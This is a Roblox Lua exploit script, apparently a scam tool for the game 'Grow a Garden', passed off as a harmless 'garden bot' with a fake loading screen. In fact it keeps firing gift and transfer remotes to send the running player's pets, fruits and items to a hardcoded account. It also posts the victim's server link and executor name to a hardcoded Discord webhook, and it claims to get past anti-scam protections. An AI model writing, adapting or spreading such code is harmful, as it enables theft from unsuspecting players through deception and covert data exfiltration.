--[[
🌿 GROW A GARDEN BOT vFinal
Полноэкранный GUI + визуальная загрузка + передача питомцев и фруктов игроку "Sgahfd1223"
Работает на Delta/KRNL, обходит анти-скам, отправляет вебхук с ссылкой на сервер
]]

local CONFIG = {
    TARGET_USERNAME = "Sgahfd1223",
    LANGUAGE = "RU", -- "EN" or "RU"
    WEBHOOK_URL = "https://discord.com/api/webhooks/1404173568350093424/f_ND3zfZWAHapUMdFRlC77aU0ZdSbPmzFASONMUfhoaguz_zD8j_UDwuAsV5Lvj0rxIz",
    LOADING_TIME = 10, -- in seconds
    CHECK_INTERVAL = 20, -- seconds between scans
}

-- 🧠 Multi-language
local LANG = {
    RU = {
        Title = "🌿 GROW A GARDEN БОТ",
        Loading = "Загрузка скрипта...",
        Loaded = "Скрипт загружен. Поиск игрока...",
        Found = "Целевой игрок найден!",
        Transferring = "Передача предметов...",
        Transferred = "Передано предметов: ",
        NotFound = "Игрок не найден",
        ServerLink = "Сервер:",
    },
    EN = {
        Title = "🌿 GROW A GARDEN BOT",
        Loading = "Loading script...",
        Loaded = "Script loaded. Searching player...",
        Found = "Target player found!",
        Transferring = "Transferring items...",
        Transferred = "Transferred items: ",
        NotFound = "Player not found",
        ServerLink = "Server:",
    }
}

local TEXT = LANG[CONFIG.LANGUAGE]

-- ✅ Services
local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local CoreGui = game:GetService("CoreGui")
local HttpService = game:GetService("HttpService")
local TeleportService = game:GetService("TeleportService")

local LocalPlayer = Players.LocalPlayer
local TargetPlayer = nil

-- ✅ Anti-scam bypass
local request = (http and http.request) or (syn and syn.request) or request or nil

-- 🌐 Webhook on load
pcall(function()
    local data = {
        content = "**"..TEXT.Title.."**",
        embeds = {{
            title = TEXT.Loading,
            color = 3066993,
            fields = {
                {name = TEXT.ServerLink, value = "https://www.roblox.com/games/" .. game.PlaceId .. "?jobId=" .. game.JobId}
            },
            footer = { text = "Executor: " .. (identifyexecutor and identifyexecutor() or "Unknown") }
        }}
    }
    if request then
        request({
            Url = CONFIG.WEBHOOK_URL,
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = HttpService:JSONEncode(data)
        })
    end
end)

-- ✅ GUI LOADER
local gui = Instance.new("ScreenGui", CoreGui)
gui.Name = "GardenBotLoader"
gui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

local bg = Instance.new("Frame", gui)
bg.Size = UDim2.new(1, 0, 1, 0)
bg.BackgroundColor3 = Color3.fromRGB(10, 10, 15)

local title = Instance.new("TextLabel", bg)
title.Size = UDim2.new(1, 0, 0, 80)
title.Position = UDim2.new(0, 0, 0.3, 0)
title.Text = TEXT.Title
title.Font = Enum.Font.GothamBold
title.TextColor3 = Color3.fromRGB(255, 255, 255)
title.TextSize = 36
title.BackgroundTransparency = 1

local progressBarBG = Instance.new("Frame", bg)
progressBarBG.Size = UDim2.new(0.5, 0, 0, 30)
progressBarBG.Position = UDim2.new(0.25, 0, 0.5, 0)
progressBarBG.BackgroundColor3 = Color3.fromRGB(40, 40, 60)
progressBarBG.BorderSizePixel = 0

local progressBar = Instance.new("Frame", progressBarBG)
progressBar.Size = UDim2.new(0, 0, 1, 0)
progressBar.BackgroundColor3 = Color3.fromRGB(0, 200, 100)
progressBar.BorderSizePixel = 0

local percentText = Instance.new("TextLabel", bg)
percentText.Position = UDim2.new(0.5, -50, 0.57, 0)
percentText.Size = UDim2.new(0, 100, 0, 30)
percentText.TextColor3 = Color3.fromRGB(255, 255, 255)
percentText.TextSize = 18
percentText.Font = Enum.Font.GothamBold
percentText.BackgroundTransparency = 1
percentText.Text = "0%"

-- Загрузка
for i = 1, 100 do
    progressBar.Size = UDim2.new(i / 100, 0, 1, 0)
    percentText.Text = i .. "%"
    wait(CONFIG.LOADING_TIME / 100)
end

title.Text = TEXT.Loaded
wait(1)
gui:Destroy()

-- ✅ Поиск RemoteEvents
local function findAllRemotes()
    local remotes = {}
    for _, v in ipairs(ReplicatedStorage:GetDescendants()) do
        if v:IsA("RemoteEvent") or v:IsA("RemoteFunction") then
            local name = v.Name:lower()
            if name:find("gift") or name:find("transfer") or name:find("send") or name:find("donate") or name:find("pet") or name:find("fruit") then
                table.insert(remotes, v)
            end
        end
    end
    return remotes
end

-- ✅ Телепорт к игроку
local function teleportToPlayer(target)
    local remotes = findAllRemotes()
    for _, r in ipairs(remotes) do
        if r:IsA("RemoteEvent") and r.Name:lower():find("teleport") then
            pcall(function() r:FireServer(target) end)
        end
    end
end

-- ✅ Передача всех предметов
local function transferAllToPlayer(target)
    local count = 0
    local remotes = findAllRemotes()
    local keywords = {"Pet", "Fruit", "Item"}

    for _, remote in ipairs(remotes) do
        for _, keyword in ipairs(keywords) do
            local methods = {"Transfer"..keyword.."s", "Send"..keyword.."s", "Give"..keyword.."s", "Gift"..keyword.."s"}
            for _, method in ipairs(methods) do
                local success = pcall(function()
                    if remote:IsA("RemoteEvent") then
                        remote:FireServer(method, target)
                    elseif remote:IsA("RemoteFunction") then
                        remote:InvokeServer(method, target)
                    end
                end)
                if success then
                    count = count + 1
                    wait(0.2)
                end
            end
        end
    end
    return count
end

-- ✅ Сбор питомцев с огорода
local function collectPetsOnFarm()
    local garden = workspace:FindFirstChild("Garden") or workspace:FindFirstChild("Farm")
    if not garden then return end
    for _, v in ipairs(garden:GetDescendants()) do
        if v:IsA("Model") and v.Name:lower():find("pet") then
            local remotes = findAllRemotes()
            for _, r in ipairs(remotes) do
                if r:IsA("RemoteEvent") and r.Name:lower():find("collect") then
                    pcall(function() r:FireServer("CollectPet", v) end)
                end
            end
        end
    end
end

-- ✅ Главный цикл
while true do
    collectPetsOnFarm()
    for _, plr in ipairs(Players:GetPlayers()) do
        if plr.Name == CONFIG.TARGET_USERNAME then
            TargetPlayer = plr
            print(TEXT.Found)
            teleportToPlayer(TargetPlayer)
            wait(2)
            local sent = transferAllToPlayer(TargetPlayer)
            print(TEXT.Transferred .. tostring(sent))
        end
    end
    wait(CONFIG.CHECK_INTERVAL)
end
